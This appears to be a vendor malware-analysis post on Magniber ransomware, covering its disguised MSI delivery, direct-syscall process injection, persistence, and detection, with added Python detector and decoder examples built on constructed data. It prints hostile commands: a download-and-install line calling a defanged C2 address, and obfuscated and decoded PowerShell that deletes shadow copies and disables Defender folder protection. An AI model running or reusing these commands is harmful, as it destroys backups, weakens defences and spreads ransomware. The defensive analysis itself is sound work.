V3 Detects and Blocks Magniber Ransomware Injection (Direct Syscall Detection)

The Magniber ransomware is consistently being distributed in high volumes. For the past few years it was distributed through Internet Explorer (IE) vulnerabilities, but it stopped exploiting them after support for the browser ended. Recently, it has been distributed to Edge and Chrome users under filenames disguised as a Windows security update package (e.g. ERROR.Center.Security.msi). The current Magniber injects the ransomware into a running process, and that process then does the damage by encrypting the user’s files.

This post explains the infection flow of the Magniber currently being distributed, its ransomware injection method, and V3’s new detection method (Direct Syscall Detection). Figure 1 shows the infection flow of the Magniber ransomware. It is distributed disguised as a security update package, under a file name such as “ERROR.Center.Security.msi”. Upon execution, it injects the ransomware code into a running process, which encrypts files. Afterward, it registers a command with the task scheduler for persistence and deletes volume shadow copies to prevent recovery.

Figure 1. Infection flow diagram of Magniber

Figure 2 shows the code which injects Magniber into a running process. It looks up the handle of a running process and calls the injection function (Inject_Magniber) inside a for loop.

Figure 2. Main injector function of Magniber

Figures 3 to 5 show the function which injects the ransomware into a running process (Inject_Magniber). The injection calls NtCreateThreadEx, NtGetContextThread, NtSetContextThread, and NtResumeThread in that order, planting the ransomware in a process running in the user environment.

Figure 3. A portion of the injection function (Inject_Magniber) 1
Figure 4. A portion of the injection function (Inject_Magniber) 2
Figure 5. A portion of the injection function (Inject_Magniber) 3

The function also shows how the injection bypasses user-mode API hooking. Instead of calling NtCreateThreadEx through ntdll.dll, where user-mode hooks are placed, Magniber executes the API’s syscall instruction from a location outside ntdll.dll (0x000001C87630012; see Figure 6), so the hook is never reached. This bypass technique, known as Direct Syscall, is detected by V3’s new Direct Syscall Detection feature.

Figure 6. Abnormal syscall call (called outside ntdll.dll)
Figure 7. Normal syscall call (called from within ntdll.dll)
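The distinction between Figures 6 and 7 comes down to one question: where in memory was the syscall instruction executed? The following is an added example, not V3’s code or anything from the page, showing how a monitor can turn that question into a verdict and then look for the four-call injection chain from Figures 3 to 5 among the flagged events. The module map, addresses and events are constructed for illustration; the inclusion of win32u.dll in the allowlist is an assumption based on that DLL hosting the GUI syscall stubs on 64-bit Windows.

```python
"""Direct-syscall call-site check, modelled on the page's Figures 6 and 7.

Added example: classifies each syscall event by the image that backs the
address of the `syscall` instruction. All module ranges, addresses and
events below are constructed for illustration, not taken from a real host.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set

# Images that legitimately contain syscall stubs on 64-bit Windows.
# ntdll.dll is the page's reference image; win32u.dll hosts the NtUser*/NtGdi*
# stubs (assumption stated in the lead-in) and is allowed so GUI apps pass.
LEGITIMATE_SYSCALL_IMAGES = {"ntdll.dll", "win32u.dll"}

# The page's four-call injection chain (Figures 3 to 5), in order.
INJECTION_SEQUENCE = (
    "NtCreateThreadEx",
    "NtGetContextThread",
    "NtSetContextThread",
    "NtResumeThread",
)


@dataclass(frozen=True)
class ModuleRange:
    name: str
    base: int
    size: int

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


@dataclass(frozen=True)
class SyscallEvent:
    pid: int
    syscall: str
    call_site: int  # address of the instruction that executed `syscall`


def module_for(addr: int, modules: Iterable[ModuleRange]) -> Optional[ModuleRange]:
    """Return the loaded image backing addr, or None for unbacked memory."""
    for module in modules:
        if module.contains(addr):
            return module
    return None


def classify(event: SyscallEvent, modules: Iterable[ModuleRange]) -> str:
    """'normal' when the syscall instruction sits in a legitimate stub image
    (Figure 7); otherwise a 'direct-syscall' verdict naming what backs it,
    or 'unbacked memory' for heap/private pages (Figure 6)."""
    backing = module_for(event.call_site, modules)
    if backing is None:
        return "direct-syscall (unbacked memory)"
    if backing.name.lower() in LEGITIMATE_SYSCALL_IMAGES:
        return "normal"
    return f"direct-syscall (from {backing.name})"


def flag_injection_sequences(events: Iterable[SyscallEvent],
                             modules: Iterable[ModuleRange]) -> Set[int]:
    """Return PIDs that issued the page's injection chain, in order, where every
    call in the chain was a direct syscall. A non-matching call neither
    advances nor resets the chain; normal (ntdll-backed) calls are ignored."""
    progress: Dict[int, int] = {}  # pid -> index of the next expected call
    flagged: Set[int] = set()
    for ev in events:
        if classify(ev, modules) == "normal":
            continue
        step = progress.get(ev.pid, 0)
        if ev.syscall != INJECTION_SEQUENCE[step]:
            continue
        step += 1
        if step == len(INJECTION_SEQUENCE):
            flagged.add(ev.pid)
            step = 0
        progress[ev.pid] = step
    return flagged


# Constructed module map: ntdll.dll and one other system DLL at plausible
# high addresses; nothing backs the 0x1C8... region used by pid 2000.
SAMPLE_MODULES: List[ModuleRange] = [
    ModuleRange("ntdll.dll", 0x7FFB12340000, 0x1F8000),
    ModuleRange("kernelbase.dll", 0x7FFB10000000, 0x2E0000),
]

# Constructed events: pid 1000 is benign (stubs inside ntdll.dll); pid 2000
# runs the whole chain from unbacked memory; pid 3000 executes a syscall
# instruction from inside kernelbase.dll, which is also not a stub image.
SAMPLE_EVENTS: List[SyscallEvent] = [
    SyscallEvent(1000, "NtCreateThreadEx", 0x7FFB123A0C12),
    SyscallEvent(1000, "NtResumeThread", 0x7FFB123A0D52),
    SyscallEvent(2000, "NtCreateThreadEx", 0x1C876300120),
    SyscallEvent(2000, "NtGetContextThread", 0x1C876300160),
    SyscallEvent(2000, "NtSetContextThread", 0x1C8763001A0),
    SyscallEvent(2000, "NtResumeThread", 0x1C8763001E0),
    SyscallEvent(3000, "NtResumeThread", 0x7FFB10010000),
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"pid {ev.pid:<5} {ev.syscall:<19} {ev.call_site:#014x}  "
              f"{classify(ev, SAMPLE_MODULES)}")
    print("injection chain via direct syscalls:",
          sorted(flag_injection_sequences(SAMPLE_EVENTS, SAMPLE_MODULES)))
```

The per-event verdict alone already separates Figure 6 from Figure 7; the sequence check adds confidence by requiring the exact four-call order the page documents before raising an injection alert, which keeps a lone unbacked syscall (for example from a JIT or a packer stub) from being reported as thread hijacking.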

Figure 8 shows an obfuscated command registered to the task scheduler for Magniber to maintain persistence. The decrypted task scheduler command is shown below. When the system is booted up, the command downloads and executes the Magniber ransomware (.msi).

Figure 8. Persistence routine of Magniber (registering a command to the task scheduler)
  • Decrypted task scheduler command
    cmd /v /c msiexec /i hxxp://146[.]19[.]106[.]31/ceggfnhm.msi /q

To prevent file recovery through the operating system, Magniber runs an obfuscated PowerShell command that deletes volume shadow copies. The decrypted version of this command is as follows.

  • Command to delete volume shadow copies (obfuscated)
    $y=$env:d;$o=$y[16]+$y[18]+$y[34]+$y[8]+$y[32]+$y[9]+$y[25]+$y[13]+$y[20]+$y[30]+$y[27]+$y[34]+$y[6]+$y[8]+$y[2]+$y[9]+$y[13]+$y[22]+$y[24]+$y[5]+$y[11]+$y[26]+$y[10]+$y[31]+$y[1]+$y[36]+$y[4]+$y[14]+$y[36]+$y[29]+$y[28]+$y[33]+$y[35]+$y[0]+$y[34]+$y[3]+$y[34]+$y[8]+$y[34]+$y[16]+$y[33];iex($o)
  • Command to delete volume shadow copies (decrypted)
    (Get-WmiObject Win32_ShadowCopy).Delete()

Then it runs a command to turn off the controlled folder access feature of Windows Defender. The obfuscated and decrypted versions of this command are as follows.

  • Command to turn off the controlled folder access feature of Windows Defender (obfuscated)
    $x=$env:n;$l=$x[17]+$x[10]+$x[22]+$x[29]+$x[31]+$x[2]+$x[26]+$x[5]+$x[10]+$x[19]+$x[10]+$x[5]+$x[10]+$x[23]+$x[14]+$x[10]+$x[13]+$x[29]+$x[0]+$x[23]+$x[9]+$x[6]+$x[11]+$x[10]+$x[7]+$x[18]+$x[23]+$x[22]+$x[5]+$x[18]+$x[11]+$x[11]+$x[10]+$x[12]+$x[24]+$x[18]+$x[11]+$x[12]+$x[10]+$x[5]+$x[3]+$x[14]+$x[14]+$x[10]+$x[30]+$x[30]+$x[13]+$x[1];
  • Command to turn off the controlled folder access feature of Windows Defender (decrypted)
    Set-MpPreference -EnableControlledFolderAccess 0
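Both obfuscated commands above use the same trick: the real command is stored in an environment variable, and the script rebuilds it character by character from that string using a fixed list of indices before handing it to iex. The decoder below is an added example for analysts, not code from the page or from AhnLab. It parses the two scripts exactly as the page prints them; because the contents of $env:d and $env:n are not on the page, the two strings in CONSTRUCTED_ENV are constructed here so that the indices resolve to the decrypted commands the page gives (unused positions are filled with x).

```python
"""Decoder for the index-selection obfuscation used by Magniber's PowerShell
commands (added example; not the page's or AhnLab's code).

Scheme: $holder=$env:NAME; $out=$holder[i1]+$holder[i2]+...; iex($out)
The scripts are copied from the page. The environment-variable values are
constructed for this example; the real ones must be captured from the
infected process, since the script carries only the indices.
"""
import re
from typing import Dict, List, Tuple

# Copied from the page (obfuscated shadow-copy deletion, variable $y/$env:d).
SHADOW_COPY_SCRIPT = (
    "$y=$env:d;$o=$y[16]+$y[18]+$y[34]+$y[8]+$y[32]+$y[9]+$y[25]+$y[13]+$y[20]"
    "+$y[30]+$y[27]+$y[34]+$y[6]+$y[8]+$y[2]+$y[9]+$y[13]+$y[22]+$y[24]+$y[5]"
    "+$y[11]+$y[26]+$y[10]+$y[31]+$y[1]+$y[36]+$y[4]+$y[14]+$y[36]+$y[29]"
    "+$y[28]+$y[33]+$y[35]+$y[0]+$y[34]+$y[3]+$y[34]+$y[8]+$y[34]+$y[16]"
    "+$y[33];iex($o)"
)

# Copied from the page (obfuscated Defender setting change, $x/$env:n).
DEFENDER_SCRIPT = (
    "$x=$env:n;$l=$x[17]+$x[10]+$x[22]+$x[29]+$x[31]+$x[2]+$x[26]+$x[5]+$x[10]"
    "+$x[19]+$x[10]+$x[5]+$x[10]+$x[23]+$x[14]+$x[10]+$x[13]+$x[29]+$x[0]"
    "+$x[23]+$x[9]+$x[6]+$x[11]+$x[10]+$x[7]+$x[18]+$x[23]+$x[22]+$x[5]+$x[18]"
    "+$x[11]+$x[11]+$x[10]+$x[12]+$x[24]+$x[18]+$x[11]+$x[12]+$x[10]+$x[5]"
    "+$x[3]+$x[14]+$x[14]+$x[10]+$x[30]+$x[30]+$x[13]+$x[1];"
)

# CONSTRUCTED: the page does not show what the installer put in $env:d and
# $env:n. These values are built so that the indices above resolve to the
# decrypted commands the page lists; 'x' marks positions the scripts never use.
CONSTRUCTED_ENV: Dict[str, str] = {
    "d": "Dd lw2cxtWh_xiCx(xGxOxnx3mSjypba-)e.o",   # 37 chars
    "n": "E0pAxrbCxaeld cxxSofxxtnFxPxx-sM",        # 32 chars
}

ENV_ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*\$env:(\w+)")
INDEX_RE = re.compile(r"\$(\w+)\[(\d+)\]")


def parse(script: str) -> Tuple[str, List[int]]:
    """Return (environment variable name, index list) for one script."""
    match = ENV_ASSIGN_RE.search(script)
    if match is None:
        raise ValueError("no '$var=$env:NAME' assignment found")
    holder, env_name = match.group(1), match.group(2)
    # Keep only index expressions on the variable that holds the env value.
    indices = [int(i) for var, i in INDEX_RE.findall(script) if var == holder]
    if not indices:
        raise ValueError(f"no index expressions reference ${holder}")
    return env_name, indices


def required_length(script: str) -> int:
    """Minimum length the environment variable must have for the script to
    run without an out-of-range index (a quick sanity check on a capture)."""
    return max(parse(script)[1]) + 1


def deobfuscate(script: str, env: Dict[str, str]) -> str:
    """Rebuild the command the way the script would, from a captured env."""
    env_name, indices = parse(script)
    if env_name not in env:
        raise KeyError(f"environment variable {env_name!r} was not captured")
    source = env[env_name]
    if len(source) < max(indices) + 1:
        raise ValueError(f"${env_name} has {len(source)} chars, "
                         f"script needs {max(indices) + 1}")
    return "".join(source[i] for i in indices)


if __name__ == "__main__":
    for name, script in (("shadow copies", SHADOW_COPY_SCRIPT),
                         ("Defender CFA", DEFENDER_SCRIPT)):
        env_name, idx = parse(script)
        print(f"{name}: $env:{env_name}, {len(idx)} chars, "
              f"needs {required_length(script)}-char source")
        print("  ->", deobfuscate(script, CONSTRUCTED_ENV))
```

Note that the decoder never executes anything: it only reproduces the string concatenation. On a real sample the environment string has to come from the infected process (a sandbox trace or a memory capture of the msiexec/PowerShell process), and required_length() is a cheap way to confirm the captured value is long enough to be the one the script was built for.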

After encrypting user files, Magniber creates ransom notes (readme.htm) in the directories containing encrypted files. The note instructs the victim to use the Tor browser to access a certain URL for file recovery; the page it leads to, shown in Figure 10, demands Bitcoin in exchange for recovering the files.

Figure 9. Ransom note of Magniber
Figure 10. Browser screen after connecting to the URL in the ransom note

Magniber is currently being distributed by typosquatting, which exploits typos made when entering domain names, and targets Chrome and Edge users on the latest Windows version. Because users can download the ransomware simply by entering a mistyped domain, extra caution is required.

AhnLab is currently responding to Magniber as shown in the following:

[Magniber Behavior Detection]
– Ransom/MDP.Magniber.M4687 (2022.08.03.03)
– Ransom/MDP.Magniber.M4683 (2022.07.19.00)

[Magniber File Detection]
– Ransomware/Win.Magniber.R592250 (2023.07.18.03)

[Magniber msi MD5]
f5dd30f503577071499a241532479279

[C2 URL]
hxxp://146[.]19[.]106[.]31/ceggfnhm.msi

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
